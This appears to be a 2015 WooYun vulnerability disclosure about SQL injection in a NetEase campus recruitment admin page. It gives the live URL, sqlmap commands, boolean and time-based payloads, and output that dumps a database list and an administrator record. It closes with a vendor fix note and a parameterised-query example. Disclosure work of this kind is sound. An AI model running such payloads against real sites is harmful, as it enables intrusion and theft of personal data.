WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-12-01: Details reported to the vendor, awaiting the vendor's handling
2015-12-03: Vendor has confirmed; details disclosed to the vendor only
2015-12-13: Details disclosed to core white hats and experts in the relevant field
2015-12-23: Details disclosed to regular white hats
2016-01-02: Details disclosed to intern white hats
2016-01-17: Details disclosed to the public
SQL injection vulnerability on a NetEase site
http://op.campus.163.com/adm/selectcate.do?flags=1,2
The link above contains a SQL injection vulnerability through which database contents can be retrieved.
$ ./sqlmap.py -u "http://op.campus.163.com/adm/selectcate.do?flags=1,2" --dbs
……
[*] starting at 23:04:20

[23:04:20] [INFO] resuming back-end DBMS 'mysql'
[23:04:20] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: flags (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: flags=1,2) AND 1129=1129 AND (6317=6317

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: flags=1,2) AND SLEEP(5) AND (3809=3809
---
[23:04:20] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.11
[23:04:20] [INFO] fetching database names
[23:04:20] [INFO] fetching number of databases
[23:04:20] [INFO] resumed: 2
[23:04:20] [INFO] resumed: information_schema
[23:04:20] [INFO] resumed: recruit
available databases [2]:
[*] information_schema
[*] recruit

$ ./sqlmap.py -u "http://op.campus.163.com/adm/selectcate.do?flags=1,2" --sql-shell
……
[*] starting at 23:07:02

[23:07:02] [INFO] resuming back-end DBMS 'mysql'
[23:07:02] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: flags (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: flags=1,2) AND 1129=1129 AND (6317=6317

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: flags=1,2) AND SLEEP(5) AND (3809=3809
---
[23:07:02] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.11
[23:07:02] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> select * from adminer limit 1;
[23:07:05] [INFO] fetching SQL SELECT statement query output: 'select * from adminer limit 1'
[23:07:05] [INFO] you did not provide the fields in your query. sqlmap will retrieve the column names itself
[23:07:05] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns
[23:07:05] [INFO] fetching current database
[23:07:05] [INFO] resumed: recruit
[23:07:05] [INFO] fetching columns for table 'adminer' in database 'recruit'
[23:07:05] [INFO] resumed: 9
[23:07:05] [INFO] resumed: username
[23:07:05] [INFO] resumed: gonghao
[23:07:05] [INFO] resumed: cnname
[23:07:05] [INFO] resumed: email
[23:07:05] [INFO] resumed: permitgroup
[23:07:05] [INFO] resumed: createtime
[23:07:05] [INFO] resumed: lasttime
[23:07:05] [INFO] resumed: lastip
[23:07:05] [INFO] resumed: status
……
[23:07:05] [INFO] resumed: 唐璜
[23:07:05] [INFO] resumed: 2011-06-29 10:50:41
[23:07:05] [INFO] resumed: [email protected]
[23:07:05] [INFO] resumed: 8705
[23:07:05] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[23:07:05] [INFO] retrieved:
[23:07:07] [INFO] resumed: 2011-06-29 10:50:41
[23:07:07] [INFO] resumed: 1
[23:07:07] [INFO] resumed: 3
[23:07:07] [INFO] resumed: 10911
select * from adminer limit 1;:    '唐璜, 2011-06-29 10:50:41, [email protected], 8705, , 2011-06-29 10:50:41, 1, 3, 10911'
sql-shell>
1. Filter the flags parameter
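As an added illustration of the recommended fix (example code written here, not NetEase's or the reporter's): the vulnerable pattern concatenates the comma-separated flags value straight into an IN (...) clause, which is what the ") AND ... AND (" payloads above exploit, while the hardened version validates it as a list of integers and binds each value as a query parameter. The table, column names and rows are constructed assumptions, and SQLite stands in for MySQL.

```python
import re
import sqlite3

# Constructed sample data standing in for a category table in the 'recruit'
# database. The table and column names are assumptions; the report only
# shows the request parameter name 'flags'.
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE category (id INTEGER PRIMARY KEY, name TEXT, flag INTEGER);
INSERT INTO category VALUES (1, 'intern', 1), (2, 'campus', 2), (3, 'social', 3);
""")


def select_cate_vulnerable(flags: str) -> list:
    """Concatenates the raw 'flags' value into IN (...): injectable.

    A value such as '1,2) AND 1129=1129 AND (6317=6317' closes the list,
    appends attacker-controlled conditions, and reopens the parenthesis.
    """
    sql = f"SELECT name FROM category WHERE flag IN ({flags})"
    return [row[0] for row in conn.execute(sql)]


# Strict allow-list: one or more small non-negative integers separated by commas.
FLAGS_RE = re.compile(r"\d{1,9}(,\d{1,9})*")


def parse_flags(flags: str) -> list:
    """Validate the parameter shape and convert it to integers; reject anything else."""
    if not FLAGS_RE.fullmatch(flags):
        raise ValueError("invalid flags parameter")
    return [int(value) for value in flags.split(",")]


def select_cate_fixed(flags: str) -> list:
    """Validates the list, then binds one '?' placeholder per value."""
    values = parse_flags(flags)
    placeholders = ",".join("?" * len(values))
    sql = f"SELECT name FROM category WHERE flag IN ({placeholders})"
    return [row[0] for row in conn.execute(sql, values)]
```

The vulnerable function returns the same rows for the true-condition payload as for the plain "1,2" request and an empty result for a false condition, which is exactly the differential sqlmap's boolean-based blind check relies on; the fixed function refuses the payload before any SQL is built.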
Severity: Medium
Vulnerability Rank: 8
Confirmed: 2015-12-03 14:53
The vulnerability has been fixed; thank you for your attention to NetEase products.
None yet